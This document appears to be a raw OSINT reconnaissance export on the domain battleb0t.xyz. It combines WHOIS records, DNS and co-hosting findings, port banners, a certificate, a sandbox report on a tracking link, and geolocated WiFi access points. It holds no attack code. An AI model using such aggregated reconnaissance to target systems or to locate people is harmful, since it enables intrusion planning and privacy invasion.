Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | pics.battleb0t.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.160): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0080004.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a53131 (Net ID: 00:01:8E:A5:31:30) | 37.780462,-122.390564 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00-evan.github.io | 185.199.111.153 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0065paula.github.io]
https://www.openphish.com/feed.txt | 0065paula.github.io |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 30 | 1 | 1 | 0 | None | pics.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 118.48.229.35.bc.googleusercontent.com | 35.229.48.118 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 112.48.229.35.bc.googleusercontent.com | 35.229.48.112 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:65:D0) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | padt-1 (Net ID: 00:01:21:1F:7B:30) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-cache: HIT | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | sni.cloudflaressl.com | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TechAir (Net ID: 00:01:21:30:60:FD) | 41.8781, -87.6298 |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /**
* dat-gui JavaScript Controller Library
* http://code.google.com/p/dat-gui
*
* Copyright 2011 Data Arts Team, Google Creative Lab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*/
t=prompt("Enter a new preset name.");t&&e.saveAs(t)}),X.bind(r,"click",function(){e.revert()})}function y(e){function t(t){return t.preventDefault(),e.width+=i-t.clientX,e.onResize(),i=t.clientX,!1}function n(){X.removeClass(e.__closeButton,he.CLASS_DRAG),X.unbind(window,"mousemove",t),X.unbind(window,"mouseup",n)}function o(o){return o.preventDefault(),i=o.clientX,X.addClass(e.__closeButton,he.CLASS_DRAG),X.bind(window,"mousemove",t),X.bind(window,"mouseup",n),!1}var i=void 0;e.__resize_handle=document.createElement("div"),S.extend(e.__resize_handle.style,{width:"6px",marginLeft:"-3px",height:"200px",cursor:"ew-resize",position:"absolute"}),X.bind(e.__resize_handle,"mousedown",o),X.bind(e.__closeButton,"mousedown",o),e.domElement.insertBefore(e.__resize_handle,e.domElement.firstElementChild)}function w(e,t){e.domElement.style.width=t+"px",e.__save_row&&e.autoPlace&&(e.__save_row.style.width=t+"px"),e.__closeButton&&(e.__closeButton.style.width=t+"px")}function x(e,t){var n={};return S.each(e.__rememberedObjects,function(o,i){var r={},s=e.__rememberedObjectIndecesToControllers[i];S.each(s,function(e,n){r[n]=t?e.initialValue:e.getValue()}),n[i]=r}),n}function E(e){for(var t=0;t<e.__preset_select.length;t++)e.__preset_select[t].value===e.preset&&(e.__preset_select.selectedIndex=t)}function C(e){0!==e.length&&oe.call(window,function(){C(e)}),S.each(e,function(e){e.updateDisplay()})}var A=Array.prototype.forEach,k=Array.prototype.slice,S={BREAK:{},extend:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(t[n])||(e[n]=t[n])}.bind(this))},this),e},defaults:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(e[n])&&(e[n]=t[n])}.bind(this))},this),e},compose:function(){var e=k.call(arguments);return function(){for(var t=k.call(arguments),n=e.length-1;n>=0;n--)t=[e[n].apply | 
https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:45:43 | Physical Coordinates | No | AbstractAPI | 92 | 0 | 2 | 0 | None | 37.7642, -122.3993 | 185.199.109.153 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 228.30.196.104.bc.googleusercontent.com | 104.196.30.228 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c599e10cab22234-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:46:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://url9846.privacybee.com/ls/click?upn=EySNPXCrbC8jDMVbJIo3ruvsNxs9Q1wvX1DDgtu1zWhbWsG0ZNo2ntDLlVBRnuNZS1EHjb7YhPU-2FrYIpzus7G6DZO3SeOLRvy65jBggU2ZCMQANI-2F-2FCHUgnRMsoG6kxqMyXH_etjgfWM5SMHZD0h0E0Jd-2B9mJe66G0Oql262yICXvCc9CouJqkjMTNb-2BR2wPe9vTfbxdtxGVuf9-2FvvmffNk0vlONiXOjubbfNYZwoi2DS-2Bd7CnzdW5ZjLPhIWQLdSolBEbvPNu-2BH0gl1QQh-2F8uE2tTVmV-2BF4bB-2BAcHT8kZ11hfCkGH6A6HsgUipE64nK1Ol1Krt49Tl8Fn8VWYdwq503npI8YK8-2BBlYdNA8gTXmui3kA-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6732:120:WilError_01"\n "Local\\SM0:6992:304:WilStaging_02"\n "Local\\SM0:6992:120:WilError_01"\n "SM0:6992:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6732:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:6732:304:WilStaging_02"\n "Local\\SM0:6732:304:WilStaging_02"\n "SM0:6732:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6732:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6732:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6732:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.123.124:49729"\n "104.26.6.190:49733"\n "142.250.191.42:49734"\n "104.18.11.207:49735"\n "104.17.24.14:49736"\n "69.16.175.42:49737"\n "185.199.111.153:49738"\n "104.19.188.97:49743"\n "172.217.12.99:49745"\n "172.64.144.98:49747"\n "142.250.72.200:49749"\n "142.250.189.206:49750"\n "157.240.22.25:49751"\n "104.17.211.204:49752"\n "142.250.191.46:49753"\n "142.250.141.156:49754"\n "104.17.239.204:49756"\n "104.17.131.171:49757"\n "104.17.68.176:49758"\n "104.18.33.171:49759"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.hubspot.com"\n "app.hubspot.com"\n "cookiepedia.co.uk"\n "js.hs-banner.com"\n "kenwheeler.github.io"\n "metrics-fe-na1.hubspot.com"\n "privacybee.com"\n "privacyportal.onetrust.com"\n "static.hsappstatic.net"\n "track.hubspot.com"\n "url9846.privacybee.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006732]\n "f_00024d" has type "data"- [targetUID: N/A]\n "21a917b2-c020-414a-8a46-b06a11ded1ca.tmp" has type "ASCII text with very long lines with no line terminators"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\21a917b2-c020-414a-8a46-b06a11ded1ca.tmp]- [targetUID: 00000000-00004716]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006732]\n "f_00023e" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004716]\n "Tabs_13323379254486290" has type "data"- [targetUID: N/A]\n "364126ff-45e7-46b0-9183-daae5e7f3b44.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\364126ff-45e7-46b0-9183-daae5e7f3b44.tmp]- [targetUID: 00000000-00006732]\n "f_000243" has type "Web Open Font Format (Version 2) TrueType length 77160 version 4.459"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006732]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma\\LICENSE]- [targetUID: 00000000-00006732]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006732]\n "f_00023d" has type "data"- [targetUID: N/A]\n "c18a3bba-8e02-4569-80ed-ecfae57fd29d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\c18a3bba-8e02-4569-80ed-ecfae57fd29d.tmp]- [targetUID: 00000000-00006732]\n "712786b6bbe95282_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\712786b6bbe95282_0]- 
[targetUID: 00000000-00006732]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6732_2117867855\\Filtering Rules-AA]- [targetUID: 00000000-00006732]\n "cf7c5ebe62e62da8_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\cf7c5ebe62e62da8_0]- [targetUID: 00000000-00006732]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006732]\n "4096c652-30d7-464d-9d7a-20dde7d02eca.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Last Browser" has type "data"- [targetUID: N/A]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\6732_28558427\\typosquatting_list.pb]- [targetUID: 00000000-00006732]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://url9846.privacybee.com/ls/click?upn=EySNPXCrbC8jDMVbJIo3ruvsNxs9Q1wvX1DDgtu1zWhbWsG0ZNo2ntDLlVBRnuNZS1EHjb7YhPU-2FrYIpzus7G6DZO3SeOLRvy65jBggU2ZCMQANI-2F-2FCHUgnRMsoG6kxqMyXH_etjgfWM5SMHZD0h0E0Jd-2B9mJe66G0Oql262yICXvCc9CouJqkjMTNb-2BR2wPe9vTfbxdtxG"\n Heuristic match: "api.hubspot.com"\n Heuristic match: "app.hubspot.com"\n Heuristic match: "cookiepedia.co.uk"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://url9846.privacybee.com"\n Heuristic match: "js.hs-banner.com"\n Heuristic match: "kenwheeler.github.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "metrics-fe-na1.hubspot.com"\n Heuristic match: "privacybee.com"\n Heuristic match: "privacyportal.onetrust.com"\n Heuristic match: 
"static.hsappstatic.net"\n Heuristic match: "track.hubspot.com"\n Heuristic match: "url9846.privacybee.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006732]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006732]\n "edge_driver.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\edge_driver.js]- [targetUID: 
00000000-00006732]\n "adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\6732_2117867855\\adblock_snippet.js]- [targetUID: 00000000-00006732]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\shopping_iframe_driver.js]- [targetUID: 00000000-00006732]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\edge_tracking_page_validator.js]- [targetUI | 185.199.111.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domain Names REG.RU, LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:12:53 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14806242505 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:8443 | 188.114.96.0/24 |
| 2023-05-12 02:56:16 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | www.ayhu.xyz |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:8a:75:f9:43:a0:e6:61:ea:e3:d4:27:72:39:cb:37:97:94:
6f:0e:14:84:fa:37:4d:a2:29:74:5d:9f:6a:9b:90:69:30:fb:
fe:80:38:47:ab:f9:93:8b:07:ed:9c:23:7a:ce:61:de:37:2c:
b5:38:61:3d:a2:a5:6a:7f:07:4e:90:cc:90:cb:f2:dc:3b:dd:
dc:6e:3d:eb:d5:9b:14:fa:58:fe:7c:53:e1:b8:07:86:02:8a:
6d:b2:53:6a:62:fd:74:1a:77:7e:1a:08:43:f8:18:7a:01:9e:
20:be:c4:45:2e:93:39:21:97:6b:7c:a2:a3:23:1c:fb:d7:fc:
ec:c5:e8:7e:b5:d7:d0:a7:3e:34:ed:91:4c:0f:7d:41:20:d6:
ae:b8:3c:8e:a2:12:49:dc:0d:d5:4c:94:96:63:8e:08:ef:7b:
64:6f:6d:f3:52:e2:36:f2:d4:c5:56:d5:b4:44:ce:06:c1:8d:
33:fb:3d:55:2f:89:df:1e:0c:e0:e0:b5:24:7c:d7:b7:f3:8a:
0e:7c:13:62:fd:45:98:d9:2b:25:ae:f4:5e:83:23:b0:c0:02:
cf:69:26:2e:fd:59:16:e1:d9:9a:02:67:43:02:ef:d7:61:4a:
bd:23:13:4e:92:4d:8b:73:c9:d8:47:4a:c4:8f:e1:ca:a1:27:
eb:65:50:df
|
